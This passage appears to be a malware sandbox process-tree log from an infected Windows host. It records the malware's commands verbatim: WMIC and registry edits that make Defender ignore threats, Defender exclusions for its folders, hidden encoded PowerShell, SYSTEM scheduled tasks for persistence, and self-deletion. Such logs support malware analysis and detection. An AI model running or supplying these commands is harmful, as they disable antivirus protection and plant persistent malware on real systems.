        5⤵
        
        PID:6704
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:8780
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:9476
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
      4⤵
      PID:8392
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:6792
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:5448
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8440
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:7348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6760
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3824
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8280
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1476
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4756
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5136
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3804
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6568
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3824
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5484
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4504
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8820
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6264
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2412
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9156
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8664
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:804
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5692
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7212
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NMbcPgNClKinC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NMbcPgNClKinC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\STjmdXhOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\STjmdXhOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YceypsUXabDXnCzNCPR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YceypsUXabDXnCzNCPR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZHcfdgyasGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZHcfdgyasGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gaSWcYIjjvwU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gaSWcYIjjvwU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QPFeEjmgnBUOfRVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QPFeEjmgnBUOfRVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nyFjvKGtfVGLAKAU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nyFjvKGtfVGLAKAU\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:2196
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3996
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:6624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8304
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\STjmdXhOU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4192
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\STjmdXhOU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6692
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YceypsUXabDXnCzNCPR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6780
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YceypsUXabDXnCzNCPR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8932
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZHcfdgyasGUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8848
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZHcfdgyasGUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4860
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gaSWcYIjjvwU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8944
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gaSWcYIjjvwU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6380
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\QPFeEjmgnBUOfRVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8828
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\QPFeEjmgnBUOfRVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8272
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4648
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8120
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nyFjvKGtfVGLAKAU /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7220
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nyFjvKGtfVGLAKAU /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:7764
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gmvOMIPVW" /SC once /ST 02:10:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:6240
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gmvOMIPVW"
  2⤵
  PID:7348
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gmvOMIPVW"
  2⤵
  PID:7820
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "xsEpqqHAgqAwsAroz" /SC once /ST 03:47:04 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\tWwhhmv.exe\" za /site_id 668658 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:228
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "xsEpqqHAgqAwsAroz"
  2⤵
  PID:6480

C:\Users\Admin\AppData\Roaming\wjfatug
C:\Users\Admin\AppData\Roaming\wjfatug
1⤵
PID:9048

C:\Users\Admin\AppData\Roaming\sgfatug
C:\Users\Admin\AppData\Roaming\sgfatug
1⤵
PID:4992

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:8300
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:8388

C:\Users\Admin\AppData\Local\Temp\A42F.exe
C:\Users\Admin\AppData\Local\Temp\A42F.exe
1⤵
PID:7864
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\A42F.exe"
  2⤵
  PID:8768
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:8468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5896

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:3968

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:3816

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6940

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6260

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8892

C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\tWwhhmv.exe
C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\tWwhhmv.exe za /site_id 668658 /S
1⤵
PID:4192
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:8228
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
      4⤵
      PID:7820
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:9264
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:9832
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bRciptYQhTCMvEFWGJ"
  2⤵
  PID:9484
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:9616
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:9816
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:9880
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:10068
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\STjmdXhOU\PeXfRr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ArGDBXWmyYtLacf" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:10128
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ArGDBXWmyYtLacf2" /F /xml "C:\Program Files (x86)\STjmdXhOU\iqhxhmf.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:9904
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "ArGDBXWmyYtLacf"
  2⤵
  PID:4472
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ArGDBXWmyYtLacf"
  2⤵
  PID:1604
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "dqMFPCMVHmhnSY" /F /xml "C:\Program Files (x86)\gaSWcYIjjvwU2\nRhxySF.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4420
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "sOuBCsGGBJoge2" /F /xml "C:\ProgramData\QPFeEjmgnBUOfRVB\rtNHuSJ.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:9404
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gdlTlvZfIMOZAvCeb2" /F /xml "C:\Program Files (x86)\YceypsUXabDXnCzNCPR\HhuuCAj.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6196
- C:\Windows\SysWOW64\schtasks.exe
